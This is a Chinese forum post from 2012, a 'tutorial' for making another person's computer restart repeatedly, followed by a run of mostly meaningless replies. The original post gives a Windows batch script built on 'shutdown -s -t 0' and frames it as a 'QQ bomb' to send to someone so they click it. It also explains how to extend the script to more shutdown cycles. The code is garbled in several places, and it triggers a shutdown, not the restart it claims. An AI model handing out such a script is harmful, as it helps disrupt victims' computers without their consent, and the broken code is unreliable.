edit_note帖子
154
stars积分
72,053
event加入
2011-10-22
电脑网络
[教程]教你让对方电脑,无限重启!
schedule发表于 2012-09-08 21:28:00
visibility查看 6,398
chat_bubble回复 483
#1 楼主
教大家一个非常简单的bat文件使用,这里可以当成QQ炸弹用。*以下的代码,如果你让对方点击了,他的电脑会连续重启5次。不信可以自己制作完点击试一下*此方法非常简单,复制以下代码到记事本:*@echo off*ifnot exist c:\1.txt echo.>c:\1.txt&gotoerr1*if not exist c:\2.txt echo.>c:\2.txt&goto err1*if not exist c:\3.txt echo.>c:\3.txt&goto err1*if not exist c:\4.txtecho.>c:\4.txt&goto err1*if not exist c:\5.txt echo.>c:\5.txt&goto err1*if not existc:\5.txt echo.>c:\6.txt&goto err1*gotoerr2*:err1*shutdown -s -t 0*:err2*复制完以后,保存到记事本,把记事本文件更改为.bat后缀的文件。
如果你想让对方连续重新启动,那就无限的增加下去,如在“ifnotexist c:\5.txt echo.>c:\5.txt&gotoerr1”后面增加“if notexist c:\5.txt echo.>c:\6.txt&goto err1”不要过分哦!
如果你想让对方连续重新启动,那就无限的增加下去,如在“ifnotexist c:\5.txt echo.>c:\5.txt&gotoerr1”后面增加“if notexist c:\5.txt echo.>c:\6.txt&goto err1”不要过分哦!
全部回复 (483)
2015-05-20 09:12:00
#402
好好好
2015-05-29 16:46:00
#403
1
2015-05-31 23:10:00
#404
,
2015-06-04 00:33:00
#405
hntyyttyytytty
2015-06-06 03:25:00
#406
看看
2015-06-07 11:13:00
#407
BB
2015-06-13 23:25:00
#408
ee
2015-06-14 19:00:00
#409
额
2015-06-15 00:12:00
#410
555
2015-06-15 12:49:00
#411
、、、、
2015-06-16 18:49:00
#412
。。。。。
2015-06-17 14:38:00
#413
。
2015-07-17 17:59:00
#414
O:-)
2015-07-26 16:43:00
#415
是的
2015-07-26 22:25:00
#416
易语言做的吗
2015-07-27 17:07:00
#417
啊
2015-07-27 17:28:00
#418
44
2015-08-18 10:49:00
#419
亏
2015-08-19 19:39:00
#420
啊啊
2015-09-03 08:59:00
#421
彡隟
登录 后才能回复
flag举报帖子